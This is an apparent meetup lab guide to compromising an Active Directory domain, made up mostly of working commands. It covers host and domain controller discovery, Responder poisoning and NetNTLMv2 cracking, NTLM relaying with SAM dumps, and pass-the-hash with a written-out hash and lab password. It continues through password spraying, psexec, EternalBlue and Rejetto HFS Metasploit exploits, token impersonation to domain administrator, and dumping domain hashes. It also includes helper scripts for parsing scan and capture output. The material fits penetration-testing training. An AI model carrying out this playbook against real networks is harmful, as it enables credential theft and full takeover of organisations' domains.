
Introduction to Active Directory exploitation.

Get started in the HackerLab with our introductory guide to exploiting an Active Directory environment.

The guide below is based on our own internal network which we provide at all of our meetups.

Recon:

Host identification:

First, connect to the lab network and check your local IP address:

# ifconfig

Once you have your IP, run a host discovery scan (-sn: no port scan, -n: no DNS lookups) to find live hosts, and cut the fifth field of each "Nmap scan report for ..." line to build a targets list:

# nmap -n -sn 192.168.101.0/24 | grep for | cut -d " " -f 5 |tee -a targets.txt

Remove your own IP (192.168.101.1 in this lab) from targets.txt so you do not scan yourself.

Now port-scan each target in a for loop, writing one normal-format (-oN) file per host so the results can be grepped into a single list afterwards. -sSVC is shorthand for -sS (SYN scan), -sV (version detection) and -sC (default scripts); -p- covers all 65535 TCP ports, so this takes a while:

# mkdir nmap
# for i in $(cat targets.txt); do nmap -p- $i -sSVC -oN nmap/$i; done

Once the scans have finished, cd into the nmap folder and run the following to get one list of hosts and open ports. The grep -v SF drops nmap's service-fingerprint lines (SF-Port...), which also contain "/tcp" but are not port entries:

# cd nmap/
# grep -Hari "/tcp" | grep -v SF | tee -a ../servicelist.txt

Identify the Domain Controllers

Scan for Kerberos (88) and LDAP/LDAPS (389, 636); a host with these open is almost certainly a domain controller:

# nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt

Check the nmap version-detection output for the domain name: on a DC the LDAP banner reports it in the form "(Domain: example.local, Site: ...)", and the smb-os-discovery script output shows it as "Domain name:".
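As an added example (not part of the original guide), the following shell function does the domain controller check against the per-host nmap -oN files from the for loop above, rather than a second scan: it flags a host only when both 88/tcp and 389/tcp are open, and pulls the domain name out of nmap's LDAP banner. The sample nmap output embedded in it is constructed, and the hosts 192.168.101.6 and 192.168.101.7 are invented for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original guide. Parses nmap "normal" (-oN) output,
# as written by: for i in $(cat targets.txt); do nmap -p- $i -sSVC -oN nmap/$i; done

# find_dcs [file...]  -- prints "<ip> <domain or ->" for every host that has BOTH
# 88/tcp (Kerberos) and 389/tcp (LDAP) open. 389 alone is not enough: any LDAP
# server (e.g. OpenLDAP) has it, only a DC also speaks Kerberos.
find_dcs() {
  awk '
    function flush() {
      if (host != "" && krb && ldap) print host, (dom == "" ? "-" : dom)
    }
    /^Nmap scan report for / {
      flush()
      host = $5; krb = 0; ldap = 0; dom = ""
      # without -n nmap prints "for name (ip)"; keep the IP in that case
      if ($6 ~ /^\(/) host = substr($6, 2, length($6) - 2)
      next
    }
    /^88\/tcp +open/  { krb = 1 }
    /^389\/tcp +open/ {
      ldap = 1
      # AD LDAP banner: "Microsoft Windows Active Directory LDAP (Domain: x.local, Site: ...)"
      if (match($0, /Domain: [^,)]+/)) dom = substr($0, RSTART + 8, RLENGTH - 8)
    }
    END { flush() }
  ' "$@"
}

# Constructed sample standing in for the nmap/192.168.101.* files:
#  .4 = DC with a version banner, .5 = workstation, .6 = DC whose banner carries
#  no domain (version probe unanswered), .7 = OpenLDAP box (389 but no 88).
sample_nmap_output() {
  cat <<'EOF'
Nmap scan report for 192.168.101.4
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-24 10:26:08Z)
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thehackerlab.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
636/tcp   open  tcpwrapped

Nmap scan report for 192.168.101.5
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Nmap scan report for 192.168.101.6
PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP

Nmap scan report for ldap01.thehackerlab.local (192.168.101.7)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 7.9p1
389/tcp   open  ldap          OpenLDAP 2.2.X - 2.3.X
EOF
}

# Against the real scan: find_dcs nmap/*
sample_nmap_output | find_dcs
```

Against the lab files you would run `find_dcs nmap/*`; a "-" in the second column means the host looks like a DC but nmap did not get a domain out of the LDAP banner, so confirm it with the smb-os-discovery output.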

NBTScan

Use nbtscan against the subnet to resolve NetBIOS names; this gives you hostnames (and the workgroup/domain name) for the live hosts without needing credentials.

Responder

In a new tab start responder on the correct network interface:

# responder -I vboxnet0

After a short time you should see NetNTLMv2 hashes being captured as clients on the network fall for the LLMNR/NBT-NS/mDNS poisoning. Let this run for around 10 minutes (longer on a real engagement, since captures depend on users and machines authenticating), then stop Responder.

Now collect the captured hashes from Responder's log directory into one file for cracking:

# cat /usr/share/responder/logs/SMB* | tee -a responderhashes.txt

Now attempt to crack these hashes with hashcat; -m 5600 is the NetNTLMv2 mode. --force only suppresses hashcat's driver warnings and is best left out unless hashcat refuses to start:

# hashcat -m 5600 --force responderhashes.txt /usr/share/wordlists/rockyou.txt
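The cat SMB* above gathers every Responder log, which includes the same user many times over and, if any client still speaks NTLMv1, SMB-NTLMv1-* files whose lines hashcat -m 5600 rejects. The following is an added example (not from the original guide) that classifies each line by hashcat mode and keeps one NetNTLMv2 line per DOMAIN\user; the sample log lines are constructed, with made-up challenge and response values.

```shell
#!/bin/sh
# Added example, not from the original guide. Responder log line formats:
#   NetNTLMv2: user::DOMAIN:serverchallenge(16 hex):NTProofStr(32 hex):blob(hex)
#   NetNTLMv1: user::DOMAIN:LMresponse(48 hex):NTresponse(48 hex):serverchallenge(16 hex)

# netntlm_kind -- reads Responder lines on stdin, prints "<hashcat mode> <line>"
# for each recognised line (5600 = NetNTLMv2, 5500 = NetNTLMv1), drops the rest.
netntlm_kind() {
  awk -F: '
    function ishex(s, n) { return length(s) == n && s ~ /^[0-9A-Fa-f]+$/ }
    NF == 6 && $2 == "" {
      if (ishex($4, 16) && ishex($5, 32))                        print "5600", $0
      else if (ishex($4, 48) && ishex($5, 48) && ishex($6, 16))  print "5500", $0
    }'
}

# unique_netntlmv2 -- keeps the first NetNTLMv2 line per DOMAIN\user, case-insensitive
# (one response per user is all hashcat needs; the rest only slow the crack down).
unique_netntlmv2() {
  netntlm_kind | awk '
    $1 == "5600" {
      line = $0; sub(/^5600 /, "", line)
      split(line, f, ":")
      key = toupper(f[3] "\\" f[1])
      if (!(key in seen)) { seen[key] = 1; print line }
    }'
}

# Constructed sample: LILLIAN captured twice (different server challenges), NOAH once,
# PAUL from a NetNTLMv1 client, plus a status line that must be ignored.
sample_responder_log() {
  cat <<'EOF'
LILLIAN::THEHACKERLAB:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000aabbccddeeff00112233445566778899
lillian::THEHACKERLAB:8877665544332211:fedcba9876543210fedcba9876543210:0101000000000000aabbccddeeff00112233445566778899
NOAH::THEHACKERLAB:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000aabbccddeeff00112233445566778899
PAUL::THEHACKERLAB:0123456789abcdef0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210fedcba9876543210:1122334455667788
[*] Skipping previously captured hash for THEHACKERLAB\LILLIAN
EOF
}

# Real use: cat /usr/share/responder/logs/SMB* | unique_netntlmv2 > responderhashes.txt
#           cat /usr/share/responder/logs/SMB* | netntlm_kind | awk '$1=="5500"' for -m 5500
sample_responder_log | unique_netntlmv2
```

The v1 lines are not useless, they just belong in a separate file run with hashcat -m 5500; mixing them into the -m 5600 file only produces "Separator unmatched" style rejects.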

With passwords for some domain users we can start enumerating the Active Directory domain with authenticated tools.

NTLM Relaying

Instead of capturing a hash and cracking it offline, a poisoned authentication attempt can be relayed straight to another host. If the victim user is a local administrator on the target, and the target does not require SMB signing, the relayed session can dump the target's local SAM, giving you local administrator hashes without cracking anything.

Edit /etc/responder/Responder.conf (older Kali installs keep it at /usr/share/responder/Responder.conf) and turn the SMB and HTTP servers off, so that Responder only poisons name lookups and leaves ports 445 and 80 free for ntlmrelayx to listen on:
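The relevant part of Responder.conf, shown here as an added illustration rather than the screenshot from the original guide. The [Responder Core] section has one On/Off switch per server; only the SMB and HTTP lines change, and comments stay on their own lines as in the stock file:

```ini
[Responder Core]

; Servers to start
; Only SMB and HTTP are changed (default is On); leave the rest as they are.
; SMB off  -> ntlmrelayx can bind 445/tcp
; HTTP off -> ntlmrelayx can bind 80/tcp
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
```

If Responder still reports SMB or HTTP as started, you edited a different copy of the config than the one the responder binary reads; it prints the path of the config it loaded at startup.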

Find all hosts that do not require SMB signing with the following nmap command (relaying only works against those; domain controllers require signing by default, so they normally drop out of this list). The grep -B 15 is a rough way of walking back from the "message_signing: disabled" line to the host line, so check the resulting list by eye:

# nmap -n -p 137,139,445 --script=smb-security-mode 192.168.101.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
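The grep -B 15 in the command above can pick up the wrong "Nmap scan report" line when a host's output is short or long, so here is an added example (not from the original guide) that walks the smb-security-mode output per host and only lists hosts whose message_signing value is "disabled". The nmap output it runs on is constructed; the hosts 192.168.101.6 and 192.168.101.7 are invented for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original guide. Input is the normal output of
#   nmap -n -p 137,139,445 --script=smb-security-mode 192.168.101.0/24
# which prints, per host, a line such as
#   |_  message_signing: disabled (dangerous, but default)
# with the value being one of: disabled, supported, required.

# smb_signing_report [file...]  -- prints "<ip> <disabled|supported|required>" per host;
# hosts without script output (445 closed or filtered) are left out.
smb_signing_report() {
  awk '
    /^Nmap scan report for / {
      host = $5
      if ($6 ~ /^\(/) host = substr($6, 2, length($6) - 2)   # "for name (ip)" form
      next
    }
    /message_signing:/ {
      for (i = 1; i <= NF; i++) if ($i == "message_signing:") print host, $(i + 1)
    }
  ' "$@"
}

# relay_targets [file...]  -- just the hosts ntlmrelayx can relay to
relay_targets() {
  smb_signing_report "$@" | awk '$2 == "disabled" { print $1 }'
}

# Constructed sample: .4 is the DC (signing required), .5 a workstation (disabled),
# .6 a hardened member server (supported but not required), .7 has 445 closed.
sample_signing_scan() {
  cat <<'EOF'
Nmap scan report for 192.168.101.4
PORT    STATE  SERVICE
137/tcp closed netbios-ns
139/tcp open   netbios-ssn
445/tcp open   microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 192.168.101.5
PORT    STATE  SERVICE
445/tcp open   microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 192.168.101.6
PORT    STATE  SERVICE
445/tcp open   microsoft-ds

Host script results:
| smb-security-mode:
|_  message_signing: supported

Nmap scan report for 192.168.101.7
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
EOF
}

# Real use: nmap -n -p 445 --script=smb-security-mode 192.168.101.0/24 -oN signing.nmap
#           relay_targets signing.nmap | tee smbsigningdisabled.txt
sample_signing_scan | relay_targets
```

"supported" hosts are worth noting separately: signing is negotiated there, so a relay to them fails, but they still accept unsigned sessions from clients that do not offer signing, which matters for other SMB attacks.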

Start Responder on the correct interface. -r and -d widen the NBT-NS answers and -w starts the WPAD proxy; note that the meaning of -d changed between Responder 2.x (NBT-NS domain suffix queries) and 3.x (DHCP answers), so check responder -h on your version:

# responder -I vboxnet0 -r -d -w

Now start impacket-ntlmrelayx against the target hosts (-tf takes the target file; with no command or executable specified it defaults to dumping the SAM of any host it gets an administrative session on). If the relay fails against SMB2-only targets, add -smb2support:

# impacket-ntlmrelayx -tf smbsigningdisabled.txt

Wait for a user who is a local administrator on one of the targets to authenticate. ntlmrelayx relays that authentication to the target and dumps its local account hashes, which you can use with pass-the-hash (psexec or pth-winexe) to log in to that system.

Once you have captured enough hashes, try them against the other systems too: local administrator passwords are frequently reused across machines, and an identical NT hash on two hosts means the same password.


ntlmrelayx writes the dumped hashes to files in your current working directory. Use the following command to log in with a pass-the-hash technique; the first half of the hash (aad3b435b51404eeaad3b435b51404ee) is the empty LM hash, so only the NT half on the right actually matters:

# pth-winexe -U thehackerlab\\administrator%aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e //192.168.101.4 cmd.exe

RPCClient and Password 'Spraying'

Get a list of domain users from the domain controller we found earlier, using Lillian's credentials (the cut commands strip the "user:[...] rid:[...]" wrapper from enumdomusers output):

# rpcclient -U "thehackerlab\\LILLIAN%noyego" 192.168.101.4 -c enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 | tee -a domainusers.txt

Open msfconsole and use the smb_login scanner to try a single password against every user in the list (password spraying). Before you spray, check the domain's account lockout policy (threshold and observation window) and stay below the threshold, otherwise you will lock out every account in the list:

# msfconsole -q
# use auxiliary/scanner/smb/smb_login
# set rhosts 192.168.101.4
# set SMBDomain thehackerlab
# set USER_FILE domainusers.txt
# set SMBPass password
# run

This recovers every account that uses that password. Other passwords worth a spray round are season/year and company/year patterns such as Summer2019 or Clientname2020; run one password per round and respect the lockout policy between rounds.

You can now use these credentials to log in to other machines with the psexec module (the account needs local administrator rights on the target for psexec to work):

# msfconsole -q
# use exploit/windows/smb/psexec
# set rhosts 192.168.101.4
# set SMBDomain thehackerlab
# set SMBUser Noah
# set SMBPass password
# run

SMBmap

Check for SMB shares accessible without credentials (null session):

# smbmap --host-file targets.txt

Now check again with Lillian's credentials. An authenticated domain user usually sees far more, including the SYSVOL and NETLOGON shares on the domain controllers, which are readable by every domain user.

# smbmap --host-file targets.txt -u LILLIAN -p noyego -d thehackerlab

Exploitation

Vulnerability scanning

Start msfconsole and use the scanner/smb/smb_ms17_010 module to find hosts vulnerable to MS17-010 (EternalBlue):

# use auxiliary/scanner/smb/smb_ms17_010
# set rhosts 192.168.101.0/24
# run

Once you have identified some vulnerable hosts, attempt to exploit them with the windows/smb/ms17_010_eternalblue module. Windows 7 targets are the most reliable; a failed attempt can crash the target, so do not fire it at production hosts casually.

# use exploit/windows/smb/ms17_010_eternalblue
# set rhost 192.168.101.5
# set lhost 192.168.101.1
# run

If the exploit succeeds you will have a shell running as NT AUTHORITY\SYSTEM on the machine.

Searching for vulnerable services

From our nmap scans we can see an interesting service with a version string: a Rejetto HTTP File Server (HFS) instance.

Check for known exploits with searchsploit.

# searchsploit http file server

Searchsploit lists a Metasploit module for this version of HFS.

In msfconsole, find and configure the module as follows:

# search rejetto
# use exploit/windows/http/rejetto_hfs_exec
# set rhost 192.168.101.3
# set lhost 192.168.101.1
# show options
# run

Escalating privileges and token impersonation

Using the new session opened on the domain controller, we check which access tokens are present on the machine. Run getsystem first: only SYSTEM can see and impersonate other users' tokens.

Once incognito is loaded we can see a token for the domain administrator account (left behind by an interactive logon or a service running as that user), which we may be able to impersonate to elevate our privileges to "Domain Administrator".

# getuid
# getsystem
# load incognito
# list_tokens -u

After impersonating the token, getuid shows we now have the rights of the domain administrator, and dropping into a shell inherits them:

# impersonate_token thehackerlab\\administrator
# getuid
# shell

As a domain administrator we now have full control over the domain.

Dumping domain hashes

Background your meterpreter session:

# background
# use post/windows/gather/smart_hashdump
# sessions
# set session 2
# run

This dumps the domain account hashes from the domain controller and saves them as loot in ~/.msf4/loot/.

These are NT hashes, so crack them with hashcat (-m 1000) or john (--format=NT):

# john --format=NT /root/.msf4/loot/20200124102608_default_192.168.101.4_windows.hashes_075130.txt --wordlist=/usr/share/wordlists/rockyou.txt